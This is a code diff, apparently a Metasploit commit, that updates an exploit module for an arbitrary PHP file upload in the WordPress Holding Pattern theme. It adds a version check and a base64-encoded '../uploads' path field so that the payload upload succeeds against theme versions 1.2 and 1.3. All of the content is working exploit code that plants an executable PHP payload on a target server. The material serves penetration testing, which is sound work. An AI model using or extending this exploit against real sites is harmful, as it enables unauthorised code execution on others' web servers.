Land rapid7#6482, Fix problem causing upload to fail on versions 1.2 and 1.3

Author: wchen-r7

modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb

@@ -43,6 +43,10 @@ def initialize(info = {})
     ))
   end
 
+  def check
+    check_theme_version_from_readme('holding_pattern')
+  end
+
   def rhost
     datastore['RHOST']
   end
@@ -59,13 +63,21 @@ def generate_mime_message(payload, payload_name)
     data = Rex::MIME::Message.new
     target_ip = IPSocket.getaddress(rhost)
     field_name = Rex::Text.md5(target_ip)
+
+    # In versions 1.2 and 1.3 of the theme, the upload directory must
+    # be encoded in base64 and sent with the request. To maintain
+    # compatibility with the hardcoded path of ../uploads in prior
+    # versions, we will send the same path in the request.
+    upload_path = Rex::Text.encode_base64('../uploads')
+
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
+    data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
     data
   end
 
   def exploit
     print_status("#{peer} - Preparing payload...")
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
     data = generate_mime_message(payload, payload_name)
 
     print_status("#{peer} - Uploading payload...")